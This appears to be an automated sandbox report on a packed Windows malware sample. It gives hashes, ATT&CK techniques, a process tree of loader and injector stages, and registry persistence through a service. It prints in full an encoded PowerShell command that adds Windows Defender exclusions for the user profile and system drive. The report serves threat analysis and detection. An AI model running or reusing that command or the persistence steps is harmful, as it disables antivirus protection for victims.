7d8de4b476f34cadc5a232f2ab633e4df4d24224f606e115f7cf370608b7f9a6

Analysis

max time kernel
121s
max time network
122s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
25-02-2024 01:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

016199db9c717a0bfd1954270803642c.exe
Size

27.8MB
MD5

016199db9c717a0bfd1954270803642c
SHA1

1c0291bb2b26d0d4adc14a919c4309ffc7a52ac7
SHA256

7d8de4b476f34cadc5a232f2ab633e4df4d24224f606e115f7cf370608b7f9a6
SHA512

9a4770affb3cd5a7e084b262d85ab208d92a804d14c3718c10b54c7901f251c503646c405658e13da096560d583321f30c365198ee1658aaa822926a75279187
SSDEEP

393216:qeriznki6iVkbSQVwdf4nxaPPJBl9OriQTR0Po0ecQFLdh063HWoiD6Hoa1qEEx3:qeo36iSFEjl9O+QsoRFA82nlKKf

Score

8^/10

persistence pyinstaller upx

Malware Config

Signatures

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\KcgYmcJgtoiCxCYfF\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\KcgYmcJgtoiCxCYfF"	xmnnG.exe

Executes dropped EXE 5 IoCs

pid	Process
2612	loader.exe
2812	injector.exe
2340	loader.exe
1208	Process not Found
1748	xmnnG.exe

Loads dropped DLL 13 IoCs

pid	Process
1752	016199db9c717a0bfd1954270803642c.exe
1752	016199db9c717a0bfd1954270803642c.exe
1796	Process not Found
2612	loader.exe
2340	loader.exe
2340	loader.exe
2340	loader.exe
2340	loader.exe
2340	loader.exe
2340	loader.exe
2340	loader.exe
1208	Process not Found
2812	injector.exe

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000500000001c852-206.dat	upx
behavioral1/files/0x000500000001c852-207.dat	upx
behavioral1/memory/2340-208-0x000007FEF5B90000-0x000007FEF6179000-memory.dmp	upx

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\SoftwareDistribution\Download\xmnnG.exe	injector.exe

Detects Pyinstaller 6 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x0007000000004e76-11.dat	pyinstaller
behavioral1/files/0x0007000000004e76-16.dat	pyinstaller
behavioral1/files/0x0007000000004e76-192.dat	pyinstaller
behavioral1/files/0x0007000000004e76-193.dat	pyinstaller
behavioral1/files/0x0007000000004e76-210.dat	pyinstaller
behavioral1/files/0x0007000000004e76-209.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2552	powershell.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
1748	xmnnG.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2552	powershell.exe
Token: SeLoadDriverPrivilege	1748	xmnnG.exe

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 1752 wrote to memory of 2552	1752	016199db9c717a0bfd1954270803642c.exe	28
PID 1752 wrote to memory of 2552	1752	016199db9c717a0bfd1954270803642c.exe	28
PID 1752 wrote to memory of 2552	1752	016199db9c717a0bfd1954270803642c.exe	28
PID 1752 wrote to memory of 2612	1752	016199db9c717a0bfd1954270803642c.exe	30
PID 1752 wrote to memory of 2612	1752	016199db9c717a0bfd1954270803642c.exe	30
PID 1752 wrote to memory of 2612	1752	016199db9c717a0bfd1954270803642c.exe	30
PID 1752 wrote to memory of 2812	1752	016199db9c717a0bfd1954270803642c.exe	31
PID 1752 wrote to memory of 2812	1752	016199db9c717a0bfd1954270803642c.exe	31
PID 1752 wrote to memory of 2812	1752	016199db9c717a0bfd1954270803642c.exe	31
PID 2612 wrote to memory of 2340	2612	loader.exe	33
PID 2612 wrote to memory of 2340	2612	loader.exe	33
PID 2612 wrote to memory of 2340	2612	loader.exe	33
PID 2812 wrote to memory of 1288	2812	injector.exe	35
PID 2812 wrote to memory of 1288	2812	injector.exe	35
PID 2812 wrote to memory of 1288	2812	injector.exe	35
PID 2812 wrote to memory of 2292	2812	injector.exe	34
PID 2812 wrote to memory of 2292	2812	injector.exe	34
PID 2812 wrote to memory of 2292	2812	injector.exe	34
PID 2812 wrote to memory of 1748	2812	injector.exe	37
PID 2812 wrote to memory of 1748	2812	injector.exe	37
PID 2812 wrote to memory of 1748	2812	injector.exe	37

C:\Users\Admin\AppData\Local\Temp\016199db9c717a0bfd1954270803642c.exe
"C:\Users\Admin\AppData\Local\Temp\016199db9c717a0bfd1954270803642c.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1752
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAYQB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAZwBoACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAYQBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAcwB4ACMAPgA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2552
- C:\Users\Admin\AppData\Local\Temp\loader.exe
  "C:\Users\Admin\AppData\Local\Temp\loader.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2612
- - C:\Users\Admin\AppData\Local\Temp\loader.exe
    "C:\Users\Admin\AppData\Local\Temp\loader.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2340
- C:\Users\Admin\AppData\Local\Temp\injector.exe
  "C:\Users\Admin\AppData\Local\Temp\injector.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Windows directory
  - Suspicious use of WriteProcessMemory
  PID:2812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c color 9
    3⤵
    PID:2292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:1288
- - C:\Windows\SoftwareDistribution\Download\xmnnG.exe
    "C:\Windows\SoftwareDistribution\Download\xmnnG.exe"
    3⤵
    - Sets service image path in registry
    - Executes dropped EXE
    - Suspicious behavior: LoadsDriver
    - Suspicious use of AdjustPrivilegeToken
    PID:1748

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\_MEI26122\api-ms-win-core-file-l1-2-0.dll

Filesize
21KB

MD5
bcb8b9f6606d4094270b6d9b2ed92139

SHA1
bd55e985db649eadcb444857beed397362a2ba7b

SHA256
fa18d63a117153e2ace5400ed89b0806e96f0627d9db935906be9294a3038118

SHA512
869b2b38fd528b033b3ec17a4144d818e42242b83d7be48e2e6da6992111758b302f48f52e0dd76becb526a90a2b040ce143c6d4f0e009a513017f06b9a8f2b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26122\api-ms-win-core-file-l2-1-0.dll

Filesize
18KB

MD5
bfffa7117fd9b1622c66d949bac3f1d7

SHA1
402b7b8f8dcfd321b1d12fc85a1ee5137a5569b2

SHA256
1ea267a2e6284f17dd548c6f2285e19f7edb15d6e737a55391140ce5cb95225e

SHA512
b319cc7b436b1be165cdf6ffcab8a87fe29de78f7e0b14c8f562be160481fb5483289bd5956fdc1d8660da7a3f86d8eede35c6cc2b7c3d4c852decf4b2dcdb7f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26122\api-ms-win-core-localization-l1-2-0.dll

Filesize
21KB

MD5
20ddf543a1abe7aee845de1ec1d3aa8e

SHA1
0eaf5de57369e1db7f275a2fffd2d2c9e5af65bf

SHA256
d045a72c3e4d21165e9372f76b44ff116446c1e0c221d9cea3ab0a1134a310e8

SHA512
96dd48df315a7eea280ca3da0965a937a649ee77a82a1049e3d09b234439f7d927d7fb749073d7af1b23dadb643978b70dcdadc6c503fe850b512b0c9c1c78dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26122\api-ms-win-core-processthreads-l1-1-1.dll

Filesize
21KB

MD5
4380d56a3b83ca19ea269747c9b8302b

SHA1
0c4427f6f0f367d180d37fc10ecbe6534ef6469c

SHA256
a79c7f86462d8ab8a7b73a3f9e469514f57f9fe456326be3727352b092b6b14a

SHA512
1c29c335c55f5f896526c8ee0f7160211fd457c1f1b98915bcc141112f8a730e1a92391ab96688cbb7287e81e6814cc86e3b057e0a6129cbb02892108bfafaf4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26122\api-ms-win-core-timezone-l1-1-0.dll

Filesize
21KB

MD5
2554060f26e548a089cab427990aacdf

SHA1
8cc7a44a16d6b0a6b7ed444e68990ff296d712fe

SHA256
5ab003e899270b04abc7f67be953eaccf980d5bbe80904c47f9aaf5d401bb044

SHA512
fd4d5a7fe4da77b0222b040dc38e53f48f7a3379f69e2199639b9f330b2e55939d89ce8361d2135182b607ad75e58ee8e34b90225143927b15dcc116b994c506

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26122\python311.dll

Filesize
642KB

MD5
3358180ed0284bbc856275fcf2f2bcca

SHA1
835ed5a079eca5a6bfc34fcde36df6cddf7e89c6

SHA256
1884ca5e1a89c22ed6b4335a05aa1deb858c9bb68f89f837818cebcb4653d154

SHA512
b710e9e68eab7e675184484b853e855c7588308176af545ad074a7096b8817d2d2b6a7d8681221327ba87e3a34cbef107c114b79f458bb4fb85a5ac938404272

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26122\ucrtbase.dll

Filesize
856KB

MD5
4e9e95378eb5713734995dad08fddfcb

SHA1
2f6a6c3415cebd84562da1d117daef2c4fa67ffd

SHA256
63c3e196784b916bad41572a8d9d7b2074dfb818ff7ae36a48e7d572b8b7e51e

SHA512
122946855423a8c4b6b5abf8f82d9c0ba07c637ca3269fb16912f80c788bdf9acf9bcb11d7d3a16e9ab5d4623a1af9fe71b04fcd3888073cc22fa1a167be5e4d

Download Submit
C:\Users\Admin\AppData\Local\Temp\loader.exe

Filesize
1.2MB

MD5
f8e1a7e8b17c79c6fc6678e52b82732f

SHA1
7ba0e776efe7a12918a042c31a3110e4e3f0244f

SHA256
8715691eb76f3448dd23f8f941644f8c539cad83e7fb82b2574554e23d7ed438

SHA512
d7d03adc7dcc72317a3940f2ee5753fbd49fcd6e91404135dd520348fc9535a5755a7212968158d548e8d266e47c5cef358678e0c16d0c2d8263a2c9a502b92d

Download Submit
C:\Users\Admin\AppData\Local\Temp\loader.exe

Filesize
692KB

MD5
ec614a5b49e8449b16ee938b7dd4ff57

SHA1
32776b319c3a9165c1831c89fbd19a3b4a1e455f

SHA256
99717faa65ddb484ace965d01a102b2db2e5572f89b7c15a2774b9a19240f3be

SHA512
ccfe663d164f9c19933d20d760c30068746980b5cdf142422b4a412e92dc10e4778371a15c7792593888d0d72517b58ff29b6ab94782b45733babc218f325828

Download Submit
C:\Windows\SoftwareDistribution\Download\xmnnG.exe

Filesize
100KB

MD5
9886a738e05f8a8fe04e9d0c81cc0909

SHA1
f659c6a123eb11f6f34f618265dbd54a9aa7f5e3

SHA256
abf99bd1d851c4c7015b999e81fb080e7e1147973e6a3a77c8ba7895cc8abbb6

SHA512
0d3b9e9a1a38efe1e963b929a33a8a13d4636d8056ab04fce958333db983b9fb401946c9b6990d18e9c2e2d4c2dbd2fb6aae5385e4234a5d86ef8adb98d56a21

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI26122\python311.dll

Filesize
484KB

MD5
67269d06053f2f6370aa04cc7b5ca136

SHA1
2aa20e5746e2399879a8fd396431bb7e5acd4a88

SHA256
e250c010af6e6b0fff09a04830b84f4f324ebfeb3376313e02228bf4c0d91a61

SHA512
871bf481f2596d86a55e0f5356f80c11ffd53f857e62dc9909461fce8f201149c083dd6534e7c15d49f0b8574c18dd22a43c18ec98de84c0ec3a315ed1bf1c80

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI26122\ucrtbase.dll

Filesize
843KB

MD5
06469c0f6ca6a00fb91fb91e6cc60435

SHA1
52546a8efe62a13119124f21b311295a56806467

SHA256
22407338d672f4bb2b4d72ac51019955057ef405d5544372bf2f2560a3009212

SHA512
d01f03aaa9da12ee0db45a03ff6e091f084eaa4881fa9f36305a41ac90a3653579b85c18891b61183b8124810d46f6415cbcde5c16ed181fc2510a5dfbd88239

Download Submit
\Users\Admin\AppData\Local\Temp\injector.exe

Filesize
507KB

MD5
15fa4864c56c1bc724f1098aba8f08fb

SHA1
faad863bfde036ac3ea9c65090fcdf8716d8147c

SHA256
3de2e86dde2444292306215c1082423e8ce8f99f5bf6e036dfb07ac32570c993

SHA512
75b5bd9273078823218cd061cd62d7cf8a8dd98d9e656007998dec0703169d738c760bc17ee51d5c89065c0b43d41e67e53cda3075d228e26d440d099b7e8465

Download Submit
\Users\Admin\AppData\Local\Temp\loader.exe

Filesize
1.2MB

MD5
8070fc2449c533f8395571c4f52b92b3

SHA1
ceea02a04d8afc1f7d90033b093e987e44c90cb4

SHA256
fc5be36646cc6ce6369f811ac06b25c398ccea709c01e1158ab8c8e042c2f299

SHA512
34d9daeb2dbdabcb5ed854c86adbf2393bc46b58fb964758a897e4f4c33fe5592aa1edefaec205d0ebb7b164f41bffd0ce6f71264830906a87b7f0c11311dabc

Download Submit
\Users\Admin\AppData\Local\Temp\loader.exe

Filesize
849KB

MD5
0c365b00983758196e57cb1074dbdc6d

SHA1
7b98558a643557741cb1fb7fa15ffff9b8205eb3

SHA256
0263833dd42a4b0351724127a2ee128ebabb82b12f57f8b60c1f42935549ed87

SHA512
ff4992039e20315d3f8ef5d0e053e3890edd729a251e86245785f6efe331efba32ad3e9d8f752306b641a65b31aa5a774d76bc4a11df3a3ef5bab3d89449a0ad

Download Submit
\Users\Admin\AppData\Local\Temp\loader.exe

Filesize
1.3MB

MD5
9490acd6c51e309656458149a529d3d1

SHA1
115bc8728eac0e19897f0f9d3d9a9e69d917b205

SHA256
b661780c0320c40a74521aed9f06ec93f08c52f930df7e2967c392a2db37db68

SHA512
063a3f3355711b8013a737f1fb9494c17193dddbe5fdf477849cc42e1d5eec78378f445778ac54cc7fa47c903ddf9986892a8cb946debd94b796c5ab45728308

Download Submit
\Users\Admin\AppData\Local\Temp\loader.exe

Filesize
1.3MB

MD5
e0ab4b40b5f1626fe332a640d5d8c8d6

SHA1
155157a9718426477de1eade05f62ab9b95988a1

SHA256
4625066ace243722abe55cfa35b0e2e69585437376621502dd6e404afb9b0561

SHA512
4a945b4c3e864a054a30b66730a501178dc377ce40aed39ff853aa32a0ebce310ae9047a58fae03365959d3ea5001ae00890dc5fb1462ff879f29e086ad80ed2

Download Submit
memory/1752-74-0x000007FEF5790000-0x000007FEF617C000-memory.dmp

Filesize
9.9MB

Download
memory/1752-1-0x00000000010A0000-0x0000000002C7C000-memory.dmp

Filesize
27.9MB

Download
memory/1752-0-0x000007FEF5790000-0x000007FEF617C000-memory.dmp

Filesize
9.9MB

Download
memory/1752-2-0x000000001CD50000-0x000000001CDD0000-memory.dmp

Filesize
512KB

Download
memory/2340-208-0x000007FEF5B90000-0x000007FEF6179000-memory.dmp

Filesize
5.9MB

Download
memory/2552-21-0x0000000002CB0000-0x0000000002D30000-memory.dmp

Filesize
512KB

Download
memory/2552-18-0x000007FEF20A0000-0x000007FEF2A3D000-memory.dmp

Filesize
9.6MB

Download
memory/2552-17-0x0000000002CB0000-0x0000000002D30000-memory.dmp

Filesize
512KB

Download
memory/2552-14-0x000007FEF20A0000-0x000007FEF2A3D000-memory.dmp

Filesize
9.6MB

Download
memory/2552-9-0x0000000001EE0000-0x0000000001EE8000-memory.dmp

Filesize
32KB

Download
memory/2552-20-0x0000000002CB0000-0x0000000002D30000-memory.dmp

Filesize
512KB

Download
memory/2552-7-0x000000001B650000-0x000000001B932000-memory.dmp

Filesize
2.9MB

Download
memory/2552-144-0x000007FEF20A0000-0x000007FEF2A3D000-memory.dmp

Filesize
9.6MB

Download
memory/2552-26-0x0000000002CB0000-0x0000000002D30000-memory.dmp

Filesize
512KB

Download